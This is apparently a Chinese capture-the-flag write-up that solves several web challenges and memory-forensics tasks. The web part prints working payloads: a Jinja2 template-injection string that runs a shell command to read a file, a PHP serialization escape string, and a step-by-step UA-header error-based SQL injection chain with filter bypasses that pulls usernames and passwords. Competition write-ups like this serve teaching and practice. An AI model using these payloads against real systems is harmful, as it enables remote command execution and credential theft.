目录

WEB

sign

SSTI

serialize

 

---

WEB

sign

 有10000个

进行bp爆破

 

 

 能发现 410 和 414长度 还有 420

410 414存在16进制的字符

拼凑出来为

\x66\x6c\x61\x67\x7b\x61\x63\x63\x39\x39\x66\x39\x30\x34\x66\x30\x65\x61\x66\x61\x34\x31\x63\x30\x36\x34\x33\x36\x38\x31\x35\x33\x39\x30\x66\x62\x65\x7d

解密

flag{acc99f904f0eafa41c06436815390fbe}

SSTI

打开后直接提示SSTI

/?Baby={{1*2}}

 

确定是SSTI漏洞

{{config.__class__.__init__.__globals__['os'].popen('cat /flag').read()}}

 serialize

字符串逃逸

?1=1=ctfctfctfctfctfctfctfctfctfctf";s:8:"password";s:5:"yunxi";}

 

 MISC

who's_computer

1.这位同学的电脑用户名叫什么(即C:\Users\{name})
2.最后一次运行计算器的时间？(格式为yyyy-mm-dd_hh:mm:ss，注意冒号为英文冒号)
flag格式为flag{xxx} xxx为md5(答案一_答案二)，例如答案一为hacker,答案二为2023-06-26_07:00:55,xxx为hacker_2023-06-26_07:00:55md5加密后的值3ae0d7baa880f348ae91a0af8ee68cc

内存取证-2
1.这位同学使用了一款聊天软件，请问此软件的版本号为?
2.这位同学在网页上登录了自己的邮箱，请问这位同学的邮箱是？
例如版本号为10.9.331,邮箱为947819814@qq.com,xxx为10.9.331_947819814@qq.com

内存取证-3
1.这位同学最后一次运行固定在任务栏的google chrome的时间(格式为yyyy-mm-dd_hh:mm:ss，注意冒号为英文冒号)
2.这位同学解压了从chrome下载了一个压缩文件，此文件的相关内容信息已经写入了到环境中，请问文件的内容是？
例如时间为2023-01-17_20:28:17,内容为part2，xxx为2023-01-17_20:28:17_part2

三道题目

第一道

volatility_2.6_win64_standalone.exe -f who's_computer.raw --profile=Win7SP1x64 filescan | grep "user" 

 提取出有关 user 的信息

这里就能发现是JiaJia

volatility_2.6_win64_standalone.exe -f who's_computer.raw --profile=Win7SP1x64 timeliner | grep "calc" 

这里就提取到了 时间 但是这个时间不是中国的时间 所以我们进行转换

2021-12-10 20:15:47

sql

弱口令爆破一下

        

admin
admin123

 

 

 然后发现回显为UA

那么多半就是UA注入

测试一下

User-Agent: '

果然发生了报错

看看闭合

User-Agent:'1'

 

发现了3个参数

我们直接注释掉后面两个

User-Agent:',1,2)-- +

' and updatexml(1,0x7e,3),1,2)-- 

 

发现过滤

我们fuzz一下

看看

发现了

updatexml 不可以   floor也不可以 那就说明就是通过extractvalue来报错注入了

' or extractvalue(1,concat(0x7e,(select database()))),1,2)-- +

得到数据库

kind

 等于过滤了 使用 like

' or extractvalue(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema  like 'kind'))),1,2)-- +

' or extractvalue(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_name like'sheet1'))),1,2)-- +

 

查值

' or extractvalue(1,concat(0x7e,(select group_concat(username,password)from kind.sheet1))),1,2)-- +

发现长度受限

substr被过滤了

我们看看limit可不可以

' or extractvalue(1,concat(0x7e,(select concat(password)from kind.sheet1 limit 1,1))),1,2)-- +

发现还没有显示完整

substr过滤我们就使用mid

 这样就得到了flag